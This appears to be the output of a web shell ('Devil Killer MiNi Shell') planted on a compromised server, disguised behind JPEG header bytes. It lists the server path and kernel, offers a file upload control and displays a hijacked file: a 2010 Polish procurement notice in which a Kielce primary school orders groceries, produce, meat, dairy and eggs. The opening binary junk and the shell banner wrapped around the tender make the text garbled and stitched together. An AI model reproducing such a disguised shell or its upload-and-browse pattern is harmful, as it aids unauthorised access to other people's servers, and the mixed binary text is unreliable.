JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/192228-N-2010.html

<p class="kh_header"><b>Kielce: Dostawa artykułów żywnościowych do Szkoły Podstawowej Nr 25 w Kielcach, w roku szkolnym 2010/2011</b><br>
<b>Numer ogłoszenia: 192228 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 25 w Kielcach , ul. Jurajska 7, 25-640 Kielce, woj. świętokrzyskie, tel. 0-41 369 98 40, faks 0-41 369 98 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp25kielce.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Szkoły Podstawowej Nr 25 w Kielcach, w roku szkolnym 2010/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ Nr: 1 NAZWA: Artykuły spożywcze.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Aromat do ciast 10g -414 szt. 2. Batonik ,, Mars lub równoważny*) - 6011 szt. 2. Budyń 40g - 824 szt. 3. Chrzan tarty 190g - 30 szt. 4. Cukier 1kg - 1686 kg. 5. Cukier puder 400g - 62 szt. 6. Cukier waniliowy 32g - 670 szt. 7. Czekolada mleczna100g - 1466 szt. 8. Czekolada z bakaliami 100g - 1200 szt. 9. Drożdże 100g - 297 szt. 10. Fasola Jaś - 120 kg. 11. Groch - 70 kg. 12. Groszek konserwowy 400g - 86 szt. 13. Herbata granulowana 100g -340 szt. 14. Kakao 200g - 22 szt. 15. Kasza jęczmienna - 357 kg. 16. Kasza manna - 20 kg. 17. Kisiel 40g - 1766 szt. 18. Koncentrat pomidorowy 200g Pudliszki lub równoważny*) - 798 szt. 19. Listek laurowy 6g - 405 szt. 20. Majeranek 15g - 150 szt. 21. Majonez 310g - 350 szt. 22. Makaron 1kg -780 szt. 23. Mąka pszenna 1kg - 1240 kg. 24. Mąka ziemniaczana 1kg -55 kg. 25. Mąka żytnia 1kg - 49 kg. 26. Mięta 34g - 5 szt. 27. Olej 3litry - 345 szt. 28. Orzech włoski 100g - 99 szt. 29. Papryka ostra 20g - 140 szt. 30. Papryka słodka 20g - 165 szt. 31. Pieprz naturalny mielony 20g - 603 szt. 32. Pieprz ziołowy 20g - 20 szt. 33. Proszek do pieczenia 36g - 200 szt. 34. Przyprawa do potraw 200g Vegeta lub równoważna*) - 540 szt. 35. Przyprawa do zup w płynie l l Magi lub równoważna *) -214 szt. 36. Przyprawa korzenna 20g - 112 szt. 37. Rodzynki 100g - 399 szt. 38. Ryż 1kg - 273 kg. 39. Sok owocowy typu Herbapol 0,5l lub równoważny*) -774 szt. 40. Sok 0,2 l kartonik - 3224 szt. 41. Sól - 255 kg. 42. Szczaw w słoiku 290g - 50 szt. 43. Wafelki w czekoladzie Grzesiek lub równoważne*) - 3961 szt. 44. Ziele angielskie 15g - 400 szt. 45. Kukurydza konserwowa 400g - 80 szt. 46. Orzeszki ziemne 100g - 880 szt.. 

CZĘŚĆ Nr: 2 NAZWA: Mrożonki.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Fasolka szparagowa -opakowanie 2500g - 240 szt. 2. Frytki - 480 kg. 3. Kalafior mrożony-opakowanie 2500g - 62 szt. 4. Marchew mrożona - opakowanie 2500g - 320 szt. 5. Mieszanka kompotowa mrożonka -opakowanie 2500g- 410 szt. 6. Mieszanka warzywna opakowanie2500g -480 szt. 7. Ryba filet z pangi białej nie glazurowany- 500 kg. 8. Ryba filet z miruny nie glazurowany - 600 kg. 9. Ryba filet z morszczuka nie glazurowany- 120 kg. 10. Śliwka mrożona - 16 kg. 11. Truskawka mrożona -opakowanie 2500g - 300 szt. 12. Brokuły mrożone - opakowanie 2500g - 20 szt. 13. Kluski śląskie - 270 kg. 14. Pyzy ziemniaczane ( puste) - 270 kg.. 

CZĘŚĆ Nr: 3 NAZWA: Pieczywo.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Bułka tarta 500g - 660 szt. 2. Bułka zwykła 50g - 2950 szt. 3. Chleb słonecznikowy 500g - 320 szt. 4. Chleb zwykły 600g - 1412 szt. 5. Pączek - 1593 szt. 6. Rogaliki 75g - 419 szt.. 

CZĘŚĆ Nr: 4 NAZWA: Owoce i warzywa.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Banany - 1215 kg. 2. Buraki - 1020 kg. 3. Cebula - 485 kg. 4. Cytryny - 224 kg. 5. Czosnek - 105 szt. 6. Gruszki - 98 kg. 7. Jabłka - 2078 kg. 8. Kalafior - 29 szt. 9. Kapusta biała - 207 kg. 10. Kapusta czerwona - 281 kg. 11. Kapusta kiszona - 619 kg. 12. Kapusta młoda - 44 szt. 13. Kapusta pekińska - 151 kg. 14. Kapusta włoska - 105 szt. 15. Koperek (pęczek) - 990 szt. 16. Mandarynki - 955 kg. 17. Marchew - 1830 kg. 18. Nektarynka - 117 kg. 19. Ogórki kiszone - 306 kg. 20. Ogórki świeże - 244 kg. 21. Papryka - 102 kg. 22. Pietruszka korzeń - 249 kg. 23. Pietruszka natka (pęczek) - 1970 szt. 24. Pomidory - 30 kg. 25. Por - 334 szt. 26. Rzodkiewka (pęczek) - 120 szt. 27. Sałata zielona - 340 szt. 28. Seler - 518 kg. 29. Śliwka kalifornijska sus. - 20 kg. 30. Śliwki - 82 kg. 31. Śliwki suszone krajowe - 30 kg. 32. Ziemniaki - 12160 kg. 33. Ziemniaki młode - 750 kg. 34. Jabłko zielone - 420 szt.. 

CZĘŚĆ Nr: 5 NAZWA: Mięso i wędliny.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Antrykot wołowy - 113 kg. 2. Boczek wędzony - 119 kg. 3. Filet z kurczaka - 494 kg. 4. Karczek wieprzowy bk - 345 kg. 5. Kiełbasa wieprz-woł. gat .I - 212 kg. 6. Łopatka wieprzowa bk - 728 kg. 7. Schab wieprzowy bk - 740 kg. 8. Skrzydło z indyka - 525 Kg. 9. Słonina - 135 kg. 10. Szynka wieprzowa bk - 601 kg. 11. Podudzie z kurczaka - 300 kg. 12. Udziec indyczy - 87 kg. 13. Wątróbka drobiowa - 42 kg. 14. Wołowina bk - 421 kg. 15. Filet indyczy - 60 kg. 16. Żeberka wieprzowe - 149 kg. 17. Udko z kurczaka - 200 kg.. 

CZĘŚĆ Nr: 6 NAZWA: Nabiał.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Deser mleczny z pianką 175g typu Korona lub równoważny -800 szt. 2. Jogurt owocowy 125g - 3200 szt. 3. Jogurt do picia Fruktis 200g lub równoważny*) - 4000 szt. 4. Masło extra kostka 200g 82,5% tłuszczu - 800 szt. 5. Masło kostka 200g 52% tłuszcz mleczny, 15% olej roślinny - 374 szt. 6. Mleko 2% długoterminowe 1 litr - 1323 szt. 7. Napój probiotyczny 100g Aktimel lub równoważny*) -1200 szt. 8. Ser biały półtłusty twarogowy - 886 kg. 9. Ser cukierniczy - 230 kg. 10. Ser żółty twardy Gołda lub równoważny*) - 84 kg. 11. Serek homogenizowany 140g - 2000 szt. 12. Serek homogenizowany 150g - 2085 szt. 13. Śmietana 0,5 litra 30% kremówka - 1085 szt. 14. Śmietana 18% 200g -2587 szt. 15. Mleczna kanapka 28g Delice lub równoważna*) - 1600 szt.. 

CZĘŚĆ Nr: 7 NAZWA: Jaja kurze.

1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia: 1. Jaja kurze kl. A (duże) - 17750 szt...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie pobiera wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji dzielności gospodarczej wystawionej nie wcześniej niż 6 miesięcy przed terminem składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp25kielce.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa Nr 25 
im. Kornela Makuszyńskiego w Kielcach
25-640 Kielce, ul. Jurajska 7
Tel./fax ; /41/ 369-98-40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 08:00, miejsce: Szkoła Podstawowa Nr 25 
im. Kornela Makuszyńskiego w Kielcach
25-640 Kielce, ul. Jurajska 7
Tel./fax ; /41/ 369-98-40
Sekretariat szkoły..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com